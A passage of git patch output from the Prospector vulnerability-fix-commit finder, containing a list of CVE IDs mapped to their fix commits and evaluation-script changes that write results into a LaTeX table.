-CVE-2019-16884;https://github.com/opencontainers/runc;None:None;False;3e425f80a8c931f88e6d94a8c831b9d5aa481657,331692baa7afdf6c186f8667cb0e6362ea0802b3; -CVE-2019-16942;https://github.com/FasterXML/jackson-databind;None:None;False;328a0f833daf6baa443ac3b37c818a0204714b0b,54aa38d87dcffa5ccc23e64922e9536c82c1b9c8,9593e16cf5a3d289a9c584f7123639655de9ddac; -CVE-2019-16943;https://github.com/FasterXML/jackson-databind;None:None;False;328a0f833daf6baa443ac3b37c818a0204714b0b,54aa38d87dcffa5ccc23e64922e9536c82c1b9c8,9593e16cf5a3d289a9c584f7123639655de9ddac; -CVE-2019-17206;https://github.com/frostming/rediswrapper;None:None;False;2751f6ff86e3f90c9e14b8b8acc8ef02c86987e1,f24212589b568c9f9ae11d4bf504f42303b341d5,748f60bafd857c24f65683426f665350e2c3f91b; -CVE-2019-17223;https://github.com/Dolibarr/dolibarr;None:None;False;c7736dde41826ac6eca3e838e57eab2f0304e256,8645fd8946eab2d2edb39ba7a3cf59282fa8b994; commit has no tags -CVE-2019-17267;https://github.com/FasterXML/jackson-databind;None:None;False;191a4cdf87b56d2ddddb77edd895ee756b7f75eb; -CVE-2019-17359;https://github.com/bcgit/bc-java;None:None;False;33a8e4aa07b21a8bcf5a582446664485f5f081b2,b1bc75254f5fea633a49a751a1a7339056f97856; -CVE-2019-17383;https://github.com/dspinhirne/netaddr-rb;None:None;False;3aac46c00a36e71905eaa619cb94d45bff6e3b51,f9639bd6e1d920cc46ff56ec11981536cb371c6b; -CVE-2019-17426;https://github.com/Automattic/mongoose;None:None;False;f3eca5b94d822225c04e96cbeed9f095afb3c31c,f88eb2524b65a68ff893c90a03c04f0913c1913e; -CVE-2019-17496;https://github.com/craftcms/cms;None:None;False;0ee66d29281af2b6c4f866e1437842c61983a672; -CVE-2019-17513;https://github.com/ratpack/ratpack;None:None;False;efb910d38a96494256f36675ef0e5061097dd77d; -CVE-2019-17531;https://github.com/FasterXML/jackson-databind;None:None;False;b5a304a98590b6bb766134f9261e6566dcbbb6d0; -CVE-2019-17541;https://github.com/ImageMagick/ImageMagick;None:None;False;39f226a9c137f547e12afde972eeba7551124493; -CVE-2019-17554;https://github.com/apache/olingo-odata4;None:None;False;c3f982db3d97e395d313ae8f231202bb2139882c,5948974ad28271818e2afe747c71cde56a7f2c63; -CVE-2019-17563;https://github.com/apache/tomcat;None:None;False;e19a202ee43b6e2a538be5515ae0ab32d8ef112c,1ecba14e690cf5f3f143eef6ae7037a6d3c16652,ab72a106fe5d992abddda954e30849d7cf8cc583; -CVE-2019-17569;https://github.com/apache/tomcat;None:None;False;b191a0d9cf06f4e04257c221bfe41d2b108a9cc8,959f1dfd767bf3cb64776b44f7395d1d8d8f7ab3,3c295d913e1d82ce25b4ad66c800313994f4e530,060ecc5eb839208687b7fcc9e35287ac8eb46998; -CVE-2019-17592;https://github.com/adaltas/node-csv-parse;None:None;False;b9d35940c6815cdf1dfd6b21857a1f6d0fd51e4a; -CVE-2019-17632;https://github.com/eclipse/jetty.project;None:None;False;cf0df6e3ffdcd64d607a35488edb5b0b75350d33,ba1fe2826d49c52f82b49bb32737a361519c0479,9e40fc9a6fbe93850233b7f03f048b1272530942; another case of "introduced by" on debian security tracker -CVE-2019-18622;https://github.com/phpmyadmin/phpmyadmin;None:None;False;ff541af95d7155d8dd326f331b5e248fea8e7111; -CVE-2019-18656;https://github.com/pimcore/pimcore;None:None;False;ca036e9f86bb5cdb3dac0930ec131e5f35e26c5f; -CVE-2019-18841;https://github.com/ankane/chartkick.js;None:None;False;3f833c2b229db140295b44074fef56428e0a8b91,b810936bbf687bc74c5b6dba72d2397a399885fa; -CVE-2019-18848;https://github.com/nov/json-jwt;None:None;False;ada16e772906efdd035e3df49cb2ae372f0f948a; -CVE-2019-18857;https://github.com/darylldoyle/svg-sanitizer;None:None;False;51ca4b713f3706d6b27769c6296bbc0c28a5bbd0; -CVE-2019-18874;https://github.com/giampaolo/psutil;None:None;False;7d512c8e4442a896d56505be3e78f1156f443465; -CVE-2019-18886;https://github.com/symfony/symfony;None:None;False;7bd4a92fc9cc15d9a9fbb9eb1041e01b977f8332,3ae3094a18a649d00d12e025da36007b5931b8d0,5ac07633314f59033dd6f975c199da2822b37533,bcfc282d42798860ac6a81c062ee6ff2ce65c80f; introduced by, but it should find also the second -CVE-2019-18887;https://github.com/symfony/symfony;None:None;False;d41bd42ad5d51e0f4d24259ec2814ccb294c3ba2,cccefe6a7f12e776df0665aeb77fe9294c285fbb,010213408e61620eb21ba5e5ef3bfba14a4ff689; -CVE-2019-18888;https://github.com/symfony/symfony;None:None;False;0b2c3a43bcedb2ae23970a78e17f81eccbbe1661,b21025b139962bfb87501b40ec43e7c3e4801435,691486e43ce0e4893cd703e221bafc10a871f365,77ddabf2e785ea85860d2720cc86f7c5d8967ed5,6be5cc75a4817657c5574553a41bdd0193d4fe51,2dfc115f6dd56fcc12a6941e8050349cc4d04dbe; -CVE-2019-18889;https://github.com/symfony/cache;None:None;False;8d5db9c0cecf8b6f79fa96583fae652224d897da; -CVE-2019-18923;https://github.com/cactus/go-camo;None:None;False;c1a5f28e28dd0b276269fe18ce1d4b794aa70655,add2d78c67fcfb9f2e78f38be35e85cf1858794d; -CVE-2019-18954;https://github.com/NetEase/pomelo;None:None;False;e0de00abf82e3306a53afc547fe0539f26fb152d,5b999c56c7244e23e5003878402a3c54ab51ed8c; -CVE-2019-18978;https://github.com/cyu/rack-cors;None:None;False;e4d4fc362a4315808927011cbe5afcfe5486f17d; -CVE-2019-18981;https://github.com/pimcore/pimcore;None:None;False;0a5d80b2593b2ebe35d19756b730ba33aa049106; -CVE-2019-18982;https://github.com/pimcore/pimcore;None:None;False;e0b48faf7d29ce43a98825a0b230e88350ebcf78; -CVE-2019-18985;https://github.com/pimcore/pimcore;None:None;False;9f2d075243a8392c114d9a8028858b9faf041e2d; -CVE-2019-18986;https://github.com/pimcore/pimcore;None:None;False;4a7bba5c3f818852cbbd29fa124f7fb09a207185; -CVE-2019-19010;https://github.com/ProgVal/Limnoria;None:None;False;3848ae78de45b35c029cc333963d436b9d2f0a35; -CVE-2019-19118;https://github.com/django/django;None:None;False;11c5e0609bcc0db93809de2a08e0dc3d70b393e4,36f580a17f0b3cb087deadf3b65eea024f479c21,103ebe2b5ff1b2614b85a52c239f471904d26244,092cd66cf3c3e175acce698d6ca2012068d878fa; -CVE-2019-19212;https://github.com/Dolibarr/dolibarr;None:None;False;6431e8e16d8ca778d222097a51c927a0526c8101; was 10.0.3:10.0.4 -CVE-2019-19274;https://github.com/python/typed_ast;None:None;False;156afcb26c198e162504a57caddfe0acd9ed7dce,dc317ac9cff859aa84eeabe03fb5004982545b3b; -CVE-2019-19275;https://github.com/python/typed_ast;None:None;False;dc317ac9cff859aa84eeabe03fb5004982545b3b; -CVE-2019-19316;https://github.com/hashicorp/terraform;None:None;False;6db3cf8e5b4cfb2a3cd1d99a813b50b2d5d363bb; commit is outside the time interval -CVE-2019-19325;https://github.com/silverstripe/silverstripe-framework;None:None;False;ad1b00ec7dc1589a05bfc7f5f8207489797ef714,49fda52b12ba59f0a04bcabf78425586a8779e89; -CVE-2019-19507;https://github.com/manvel-khnkoyan/jpv;None:None;False;fdab85599fd92aea87af35fb4c52ba26ccbdd427; -CVE-2019-19576;https://github.com/getk2/k2;None:None;False;d1344706c4b74c2ae7659b286b5a066117155124; -CVE-2019-19619;https://github.com/documize/community;None:None;False;a4384210d4d0d6b18e6fdb7e155de96d4a1cf9f3; -CVE-2019-19687;https://github.com/openstack/keystone;None:None;False;17c337dbdbfb9d548ad531c2ad0483c9bce5b98f; -CVE-2019-19703;https://github.com/ktorio/ktor;None:None;False;0c108156f45423d09014b47be810188629cb878f; -CVE-2019-19794;https://github.com/miekg/dns;None:None;False;8ebf2e419df7857ac8919baa05248789a8ffbf33; -CVE-2019-19844;https://github.com/django/django;None:None;False;f4cff43bf921fcea6a29b726eb66767f67753fa2,4d334bea06cac63dc1272abcec545b85136cca0e,302a4ff1e8b1c798aab97673909c7a3dfda42c26,5b1fbcef7a8bec991ebe7b2a18b5d5a95d72cb70; -CVE-2019-19919;https://github.com/handlebars-lang/handlebars.js;None:None;False;2078c727c627f25d4a149962f05c1e069beb18bc,213c0bbe3c4bd83a534d67384e5afa0000347ff6; -CVE-2019-20330;https://github.com/FasterXML/jackson-databind;None:None;False;fc4214a883dc087070f25da738ef0d49c2f3387e; -CVE-2019-20444;https://github.com/netty/netty;None:None;False;745814b382e828c344aeff2ab4fd9530fbb7cdfe,a7c18d44b46e02dadfe3da225a06e5091f5f328e; -CVE-2019-1000005;https://github.com/mpdf/mpdf;None:None;False;20ff6399433c18233f31817ba2f35a86dd9d5e22; commit is outside the time interval -CVE-2019-1000007;https://github.com/horazont/aioxmpp;None:None;False;f151f920f439d97d4103fc11057ed6dc34fe98be,29ff0838a40f58efe30a4bbcea95aa8dab7da475; -CVE-2019-1000021;https://github.com/poezio/slixmpp;None:None;False;7cd73b594e8122dddf847953fcfc85ab4d316416; -CVE-2019-1002101;https://github.com/kubernetes/kubernetes;None:None;False;47063891dd782835170f500a83f37cc98c3c1013,ee7edb77659902afbe2f7b872159cf9f952a8e23,b18e16e5ca330fccaef34798cabf64fd9f23409b,c14a780d3af9f3b66e561ce0d7380e18e8fa1bf9,185dec7f90110c29353dac4609684470349f4b6e,38a3162748adb2ca733fd4de9558fc77f60cfa8e,972b75de1377aff7a5cdba82ac4c86fdd32da07b,2f9ad66eaca587e516d5edd5edd070efc118b31f; introduced by... -CVE-2019-1010142;https://github.com/secdev/scapy;None:None;False;0d7ae2b039f650a40e511d09eb961c782da025d9,905c80d6ed435477224c53de8850f763b04d495d; -CVE-2019-1010266;https://github.com/lodash/lodash;None:None;False;5c08f18d365b64063bfbfa686cbb97cdd6267347; -CVE-2019-1010306;https://github.com/stevegraham/slanger;None:None;False;f26f80c675dc4d853bce401743779a6959981af1,5267b455caeb2e055cccf0d2b6a22727c111f5c3; -CVE-2019-1020012;https://github.com/parse-community/parse-server;None:None;False;8709daf698ea69b59268cb66f0f7cee75b52daa5; -CVE-2020-1747;https://github.com/yaml/pyyaml;None:None;False;5080ba513377b6355a0502104846ee804656f1e0; -CVE-2020-1928;https://github.com/apache/nifi;None:None;False;34f2a592df8996b5f9e65039a35ecd8c31417fbd; -CVE-2020-1935;https://github.com/apache/tomcat;None:None;False;702bf15bea292915684d931526d95d4990b2e73d,ae8c82eff96990878e79691819ae941538ee62fd,8fbe2e962f0ea138d92361921643fe5abe0c4f56,8bfb0ff7f25fe7555a5eb2f7984f73546c11aa26,b191a0d9cf06f4e04257c221bfe41d2b108a9cc8,959f1dfd767bf3cb64776b44f7395d1d8d8f7ab3,060ecc5eb839208687b7fcc9e35287ac8eb46998; last three not correct from tracer -CVE-2020-1937;https://github.com/apache/kylin;None:None;False;e373c64c96a54a7abfe4bccb82e8feb60db04749,1f9f44ceb818b46518176e81c6dea5a0d12750cf; -CVE-2020-1938;https://github.com/apache/tomcat;None:None;False;f7180bafc74cb1250c9e9287b68a230f0e1f4645,0f725b323a74b64cdb35fce04b54427582ad6063,15cd78c528425c693f1d2b51057f32d3d63d360a,b99fba5bd796d876ea536e83299603443842feba,0d633e72ebc7b3c242d0081c23bba5e4dacd9b72,bd5ebb63e438a253bbd9b035425ece915d3feb21,4c933d80e340b4a841a672060351b2190b326782; -CVE-2020-1940;https://github.com/apache/jackrabbit-oak;None:None;False;9b78a60d5d0c3e199c006d92590dc29d39379679,756d0387ef39dc3a7a84f6644a318e74535953e6,b615992fc5202046e9479a29d6a7bd41d6258d09,3e1c6e13b67331710a1747223d8e6ee22c5fae9c,21a47b758bb24b1327c795cf421dc755f7959d2f,e7180a8d9c4f14b2de1928861dd27287e5fb59bd,138318257a57703ef6dd0f7430c115f41ffe8f85; -CVE-2020-5215;https://github.com/tensorflow/tensorflow;None:None;False;5ac1b9e24ff6afc465756edf845d2e9660bd34bf,c6170fb37c65556fda58a014d8a3235ad75f1cfc,7dc97c2704f49f20719facd1f9983c114b0b451b,e7201bae4a618ce14d4b6e11ef47fa38d7f3ffb3,54a06baa1cf13bd7057c5ce372c90f6bbe1cbc57; -CVE-2020-5219;https://github.com/peerigon/angular-expressions;None:None;False;061addfb9a9e932a970e5fcb913d020038e65667; -CVE-2020-5223;https://github.com/PrivateBin/PrivateBin;None:None;False;2caddf985f35c6b660b19ff62bb9ddd2d9f33118,4bf7f863dc2ffea1ea105e575205ab0f83ed2751,8d0ac336d23cd8c98e71d5f21cdadcae9c8a26e6; -CVE-2020-5224;https://github.com/jazzband/django-user-sessions;None:None;False;f0c4077e7d1436ba6d721af85cee89222ca5d2d9; -CVE-2020-5227;https://github.com/lkiesow/python-feedgen;None:None;False;f57a01b20fa4aaaeccfa417f28e66b4084b9d0cf; -CVE-2020-5229;https://github.com/opencast/opencast;None:None;False;32bfbe5f78e214e2d589f92050228b91d704758e; -CVE-2020-5230;https://github.com/opencast/opencast;None:None;False;cd15f4017d9dc2836f5ffbdeeb115607501b7e97,bbb473f34ab95497d6c432c81285efb0c739f317; -CVE-2020-5232;https://github.com/ensdomains/ens;None:None;False;36e10e71fcddcade88646821e0a57cc6c19e1ecf; -CVE-2020-5233;https://github.com/oauth2-proxy/oauth2-proxy;None:None;False;0198dd6e9378405c432810e190288d796da46e4d,a316f8a06f3c0ca2b5fc5fa18a91781b313607b2; -CVE-2020-5236;https://github.com/Pylons/waitress;None:None;False;6e46f9e3f014d64dd7d1e258eaf626e39870ee1f; -CVE-2020-5237;https://github.com/1up-lab/OneupUploaderBundle;None:None;False;a6011449b716f163fe1ae323053077e59212350c,d59fcd2e5f675ee83c53965e16d21a942e90a9ef; -CVE-2020-5243;https://github.com/ua-parser/uap-core;None:None;False;0afd61ed85396a3b5316f18bfd1edfaadf8e88e1,a679b131697e7371f0441f4799940779efa2f27e,dd279cff09546dbd4174bd05d29c0e90c2cffa7c,7d92a383440c9742ec878273c90a4dcf8446f9af,e9a1c74dae9ecd4aa6385bd34ef6c7243f89b537; -CVE-2020-5245;https://github.com/dropwizard/dropwizard;None:None;False;d87d1e4f8e20f6494c0232bf8560c961b46db634,28479f743a9d0aab6d0e963fc07f3dd98e8c8236; -CVE-2020-5247;https://github.com/puma/puma;None:None;False;c36491756f68a9d6a8b3a49e7e5eb07fe6f1332f,694feafcd4fdcea786a0730701dad933f7547bea,1b17e85a06183cd169b41ca719928c26d44a6e03; -CVE-2020-5249;https://github.com/puma/puma;None:None;False;c22712fc93284a45a93f9ad7023888f3a65524f3; -CVE-2020-5310;https://github.com/python-pillow/Pillow;None:None;False;4e2def2539ec13e53a82e06c4b3daf00454100c4,b9c68540dc7091c644860a7ed31ec4b79dd9363e; -CVE-2020-5311;https://github.com/python-pillow/Pillow;None:None;False;be44f0d9923485f3ed3a7a9fd479cf8cf69d814a,a79b65c47c7dc6fe623aadf09aa6192fc54548f3; -CVE-2020-5312;https://github.com/python-pillow/Pillow;None:None;False;8f0c8f731190f761180bed827d07b7a740d8555b,93b22b846e0269ee9594ff71a72bec02d2bea8fd; -CVE-2020-5313;https://github.com/python-pillow/Pillow;None:None;False;c40bc258472c83168a997a9bf4e4b5934397774a,a09acd0decd8a87ccce939d5ff65dab59e7d365b; -CVE-2020-5390;https://github.com/IdentityPython/pysaml2;None:None;False;5e9d5acbcd8ae45c4e736ac521fd2df5b1c62e25; -CVE-2020-5398;https://github.com/spring-projects/spring-framework;None:None;False;6ce19ff86138a9dd284588fb62c73af5bc97ec66,0583b334b46cf2a591c72c2708ee3d2ac5d2b58c,41f40c6c229d3b4f768718f1ec229d8f0ad76d76,956ffe68587c8d5f21135b5ce4650af0c2dea933; -CVE-2020-5529;https://github.com/HtmlUnit/htmlunit;None:None;False;934390fefcd2cd58e6d86f2bc19d811ae17bfa28; -CVE-2020-6802;https://github.com/mozilla/bleach;None:None;False;f77e0f6392177a06e46a49abd61a4d9f035e57fd,996cde7a2439a2323f9c4b2567c8b8449d393351; -CVE-2020-6816;https://github.com/mozilla/bleach;None:None;False;175f67740e7951e1d80cefb7831e6c3e4efeb986,e4e9e21e7aebff40c88fafa4319bba4636a602d9; -CVE-2020-6836;https://github.com/handsontable/formula-parser;None:None;False;396b089738d4bf30eb570a4fe6a188affa95cd5e; -CVE-2020-7212;https://github.com/urllib3/urllib3;None:None;False;a74c9cfbaed9f811e7563cfc3dce894928e0221a,a2697e7c6b275f05879b60f593c5854a816489f0; -CVE-2020-7219;https://github.com/hashicorp/consul;None:None;False;b788f729e9653d4a81691cbccedca2a2ac06f5ea,5531678e9eb7c5548df8fa86e9e77a573c233e46; Version mismatch, re run -CVE-2020-7596;https://github.com/codecov/codecov-node;None:None;False;f429409922cc52d0684f6e8f897363b363ed04cd,2f4eff90dd21e58dd56074dc4933b15a91373de6; -CVE-2020-7597;https://github.com/codecov/codecov-node;None:None;False;02cf13d8b93ac547b5b4c2cfe186b7d874fd234f; -CVE-2020-7598;https://github.com/minimistjs/minimist;None:None;False;38a4d1caead72ef99e824bb420a2528eec03d9ab,63e7ed05aa4b1889ec2f3b196426db4500cbda94; This repo was wrong (not existant). I expect it to not find anything -CVE-2020-7608;https://github.com/yargs/yargs-parser;None:None;False;63810ca1ae1a24b08293a4d971e70e058c7a41e2,6e36df108cd8ed6443c4d4a4536b55b6e9552b3d,c893d3072f7d31243b750b1d599b0826b8aaefa4; -CVE-2020-7981;https://github.com/alexreisner/geocoder;None:None;False;dcdc3d8675411edce3965941a2ca7c441ca48613; -CVE-2020-8116;https://github.com/sindresorhus/dot-prop;None:None;False;3039c8c07f6fdaa8b595ec869ae0895686a7a0f2,c914124f418f55edea27928e89c94d931babe587; -CVE-2020-8125;https://github.com/lukeed/klona;None:None;False;200e8d1fd383a54790ee6fc8228264c21954e38e; -CVE-2020-8131;https://github.com/yarnpkg/yarn;None:None;False;0e7133ca28618513503b4e1d9063f1c18ea318e5; -CVE-2020-8134;https://github.com/TryGhost/Ghost;None:None;False;47739396705519a36018686894d1373e9eb92216,a98579c2ef52e09349ee08f36a2a3e2e3670568a; -CVE-2020-8840;https://github.com/FasterXML/jackson-databind;None:None;False;9bb52c7122271df75435ec7e66ecf6b02b1ee14f,914e7c9f2cb8ce66724bf26a72adc7e958992497; -CVE-2020-8945;https://github.com/proglottis/gpgme;None:None;False;92153bcb59bd2f511e502262c46c7bd660e21733,d43d199046c30db9bef90de20c09843bb8b45737,d575e5df6a8359a0ad12f59a8377d362c3eb6afd,7e8c79da5ec1bd810f01f46df83a8a914e49f4fa; -CVE-2020-9281;https://github.com/ckeditor/ckeditor4;None:None;False;0e15fa67271bd2e8b165c48368968f2e908860d7; -CVE-2020-9283;https://github.com/golang/crypto;None:None;False;bac4c82f69751a6dd76e702d54b3ceb88adab236; -CVE-2020-9402;https://github.com/django/django;None:None;False;fe886a3b58a93cfbe8864b485f93cb6d426cd1f2,02d97f3c9a88adc890047996e5606180bd1c6166,26a5cf834526e291db00385dd33d319b8271fc4c,6695d29b1c1ce979725816295a26ecc64ae0e927; -CVE-2020-9546;https://github.com/FasterXML/jackson-databind;None:None;False;1e64db6a2fad331f96c7363fda3bc5f3dffa25bb,9f4e97019fb0dd836533d0b6198c88787e235ae2; -CVE-2020-9547;https://github.com/FasterXML/jackson-databind;None:None;False;1e64db6a2fad331f96c7363fda3bc5f3dffa25bb,9f4e97019fb0dd836533d0b6198c88787e235ae2; -CVE-2020-9548;https://github.com/FasterXML/jackson-databind;None:None;False;1e64db6a2fad331f96c7363fda3bc5f3dffa25bb,9f4e97019fb0dd836533d0b6198c88787e235ae2; -CVE-2020-10236;https://github.com/Froxlor/Froxlor;None:None;False;6b09720ef8a1cc008751dd0ca0140a0597fedce5; -CVE-2020-10591;https://github.com/walmartlabs/concord;None:None;False;ab32c17f85200545ed6376badc528c7df95f5adb; -CVE-2020-10594;https://github.com/Styria-Digital/django-rest-framework-jwt;None:None;False;bea6d8f4099e4794c2b74a97ff85bd0401514313,868b5c22ddad59772b447080183e7c7101bb18e0; -CVE-2020-10672;https://github.com/FasterXML/jackson-databind;None:None;False;592872f4235c7f2a3280725278da55544032f72d; -CVE-2020-10673;https://github.com/FasterXML/jackson-databind;None:None;False;1645efbd392989cf015f459a91c999e59c921b15; \ No newline at end of file From 7244462ec53be88b4a28c9fc03ae17d44148bfbb Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 19 Jul 2024 09:08:01 +0000 Subject: [PATCH 042/130] mounts volume so that reports are available on the host --- prospector/docker-compose.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/prospector/docker-compose.yml b/prospector/docker-compose.yml index f1c6171e1..3f9e2b1ef 100644 --- a/prospector/docker-compose.yml +++ b/prospector/docker-compose.yml @@ -28,8 +28,8 @@ services: context: . dockerfile: docker/worker/Dockerfile volumes: - - ./:/app - # - ./pipeline/reports:/app/pipeline/reports + - ./data_sources/reports:/app/data_sources/reports + - ./evaluation/data/reports/:/app/evaluation/data/reports depends_on: - redis environment: From 910463e296f798d25211b0a77e26a6efc49bd6cf Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 19 Jul 2024 09:08:30 +0000 Subject: [PATCH 043/130] adds function to update latex table from D6.3 report --- prospector/evaluation/analyse.py | 14 ++++-- prospector/evaluation/config.yaml | 7 ++- prospector/evaluation/data/results/table.tex | 28 +++++++++++ prospector/evaluation/dispatch_jobs.py | 9 ++-- prospector/evaluation/run_multiple.py | 9 +++- prospector/evaluation/save_results.py | 52 ++++++++++++++++++++ 6 files changed, 107 insertions(+), 12 deletions(-) create mode 100644 prospector/evaluation/data/results/table.tex create mode 100644 prospector/evaluation/save_results.py diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index add520cf3..5777e6dbb 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -13,8 +13,10 @@ from evaluation.dispatch_jobs import ( INPUT_DATA_PATH, PROSPECTOR_REPORT_PATH, + ANALYSIS_RESULTS_PATH, build_table_row, ) +from evaluation.save_results import update_latex_table from evaluation.utils import load_dataset @@ -274,6 +276,7 @@ def analyze_prospector(filename: str): # noqa: C901 | results["CVE_ID_IN_MESSAGE"] ) ) + print("I'm here") total = len(dataset) - skipped rulescount = dict(sorted(rulescount.items())) @@ -320,13 +323,14 @@ def analyze_prospector(filename: str): # noqa: C901 total_check = sum([len(x) for x in results.values()]) print(total_check) # total_year = sum([len([x for x in y if YEAR in x]) for y in results.values()]) + table_data = [] for key, value in results.items(): - print(f"{key}: {len(value)} ({(len(value)/1315)*100:.2f}%)") - # print( - # f"{key}: {(len([x for x in value if YEAR in x]) / total_year) * 100:.2f}%" - # ) + # print(f"{key}: {len(value)} ({(len(value)/1315)*100:.2f}%)") # Sanity Check + table_data.append([len(value), len(value) / len(dataset) * 100]) + + update_latex_table("MVI", table_data, f"{ANALYSIS_RESULTS_PATH}table.tex") - # total_check += len(value) + # total_check += len(value) yearly_timestamps = { k: v for k, v in yearly_timestamps.items() if len(v) > 30 } diff --git a/prospector/evaluation/config.yaml b/prospector/evaluation/config.yaml index 5e019ec51..0ec3bb8bc 100644 --- a/prospector/evaluation/config.yaml +++ b/prospector/evaluation/config.yaml @@ -1,8 +1,11 @@ # Input Data -input_data_path: evaluation/data/input # datasets to run prospector on (CSV: ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS) +input_data_path: evaluation/data/input/ # datasets to run prospector on (CSV: ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS) # Prospector Reports -prospector_reports_path: evaluation/data/reports # reports generated by Prospector, sorted by names of input datasets +prospector_reports_path: evaluation/data/reports/ # reports generated by Prospector, sorted by names of input datasets + +# Analysis Results +analysis_results_path: evaluation/data/results/ # Prospector settings run_containerised: True \ No newline at end of file diff --git a/prospector/evaluation/data/results/table.tex b/prospector/evaluation/data/results/table.tex new file mode 100644 index 000000000..ca0cacde7 --- /dev/null +++ b/prospector/evaluation/data/results/table.tex @@ -0,0 +1,28 @@ +\begin{table} + \centering + \tiny + \begin{tabular}{ l c c c c c c} + \rowcolor{gray!50} \textbf{Result} & \textbf{MVI} & \textbf{\%} & \textbf{AVI} & \textbf{\%} & \textbf{NVI} & \textbf{\%} \\ + High confidence & 142 & 10.765731614859742 & 976 & 74.56 & 928 & 71.61 \\ %qui era 200 + \begin{tabular}{l} + \quad Commit in reference \\ + \end{tabular} & 0 & 0.0 & 865 & 66.08 & 865 & 66.75 \\ + \begin{tabular}{l} + \quad CVE ID in message \\ + \end{tabular} & 0 & 0.0 & 66 & 5.04 & 32 & 2.47 \\ + \begin{tabular}{l} + \quad CVE ID in Issue \\ + \end{tabular} & 0 & 0.0 & 4 & 0.31 & 1 & 0.08 \\ + \begin{tabular}{l} + \quad Cross Reference \\ + \end{tabular} & 19 & 1.4404852160727823 & 41 & 3.13 & 30 & 2.31 \\ + Medium confidence & 5 & 0.37907505686125853 & 97 & 7.41 & 50 & 3.86 \\ + Low confidence & 3 & 0.22744503411675512 & 90 & 6.88 & 45 & 3.47 \\ + Not found (rank $> 10$) & 46 & 3.4874905231235784 & 35 & 2.67 & 27 & 2.08 \\ + Not reported & 9 & 0.6823351023502654 & 97 & 7.41 & 232 & 17.90 \\ + False Positive & 0 & 0.0 & 14 & 1.07 & 14 & 1.08 \\ + \textbf{Total} & \textbf{1315} & & \textbf{1309} & & \textbf{1296} & + \end{tabular} + \caption{Summary of execution results (MVI=manually-supplied version intervals; AVI=automatically-determined version intervals; NVI=no version intervals supplied)} + \label{tab:tracer_dataset_results} +\end{table} \ No newline at end of file diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index b59ea8819..7af675f2d 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -3,6 +3,7 @@ import os from typing import List +from omegaconf import OmegaConf import redis import requests from dateutil.parser import isoparse @@ -18,9 +19,11 @@ from llm.llm_service import LLMService from util.config_parser import parse_config_file -INPUT_DATA_PATH = "evaluation/data/input/" -PROSPECTOR_REPORT_PATH = "evaluation/data/reports/" +evaluation_config = OmegaConf.load("evaluation/config.yaml") +INPUT_DATA_PATH = evaluation_config.input_data_path +PROSPECTOR_REPORT_PATH = evaluation_config.prospector_reports_path +ANALYSIS_RESULTS_PATH = evaluation_config.analysis_results_path # get the redis server url config = parse_config_file() @@ -311,7 +314,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): """Dispatches jobs to the queue.""" dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") - # dataset = dataset[:50] + # dataset = dataset[:5] # Only run a subset of CVEs if the user supplied a selected set if len(selected_cves) != 0: diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/run_multiple.py index 2143fe4f1..fd1320156 100644 --- a/prospector/evaluation/run_multiple.py +++ b/prospector/evaluation/run_multiple.py @@ -9,7 +9,10 @@ analyze_prospector, analyze_results_rules, ) -from evaluation.dispatch_jobs import dispatch_prospector_jobs, parallel_execution +from evaluation.dispatch_jobs import ( + dispatch_prospector_jobs, + parallel_execution, +) def is_missing(path: str): @@ -101,7 +104,9 @@ def main(argv): # parallel_execution(args.input) # analysis of Prospector report - elif args.analyze and not args.rules and not args.execute and not args.stats: + elif ( + args.analyze and not args.rules and not args.execute and not args.stats + ): analyze_prospector(args.input) elif args.analyze and args.stats and not args.rules and not args.execute: diff --git a/prospector/evaluation/save_results.py b/prospector/evaluation/save_results.py new file mode 100644 index 000000000..e7388eafa --- /dev/null +++ b/prospector/evaluation/save_results.py @@ -0,0 +1,52 @@ +from typing import List + + +def save_to_json(): + pass + + +def save_to_csv(): + pass + + +def update_latex_table(mode: str, data: List[List[str, str]], file_path: str) -> None: + """Updates the latex table at {ANALYSIS_RESULTS_PATH}/`file_path`. For this to work, the table latex code from D6.3 for tracer_dataset_results table must be saved in the file. + + Params: + data (List(List(int, int))): The list of data, each item should be another list of two integers: the total and percentage. + + Saves: + The newly updated latex table at `file_path` + + Disclaimer: Partly generated with Claude Opus 3. + """ + # Read the existing LaTeX table from the file + with open(file_path, 'r') as file: + table_lines = file.readlines() + + # Find the line numbers to edit; CHANGE if table changes! + lines_to_edit = [5, 8, 11, 14, 17, 18, 19, 20, 21, 22] + + # Update the corresponding columns based on the mode + if mode == 'MVI': + col_indices = [1, 2] + elif mode == 'AVI': + col_indices = [3, 4] + elif mode == 'NVI': + col_indices = [5, 6] + else: + raise ValueError('Invalid mode. Please choose from MVI, AVI, or NVI.') + + try: + for i, line_number in enumerate(lines_to_edit): + row_data = table_lines[line_number].split('&') + for j, col_index in enumerate(col_indices): + row_data[col_index] = str(data[i][j]) + + table_lines[line_number] = ' & '.join(row_data) + except IndexError: + raise IndexError(f"Invalid data structure at row {line_number}, column {j}") + + # Write the updated table back to the file + with open(file_path, 'w') as file: + file.writelines(table_lines) From 59c0c6646065b2098ab8cf0e909d68d400e8dda5 Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 19 Jul 2024 13:44:31 +0000 Subject: [PATCH 044/130] puts matteo's code into functions and writes results to files instead of console --- prospector/evaluation/data/results/table.tex | 28 -------------------- 1 file changed, 28 deletions(-) delete mode 100644 prospector/evaluation/data/results/table.tex diff --git a/prospector/evaluation/data/results/table.tex b/prospector/evaluation/data/results/table.tex deleted file mode 100644 index ca0cacde7..000000000 --- a/prospector/evaluation/data/results/table.tex +++ /dev/null @@ -1,28 +0,0 @@ -\begin{table} - \centering - \tiny - \begin{tabular}{ l c c c c c c} - \rowcolor{gray!50} \textbf{Result} & \textbf{MVI} & \textbf{\%} & \textbf{AVI} & \textbf{\%} & \textbf{NVI} & \textbf{\%} \\ - High confidence & 142 & 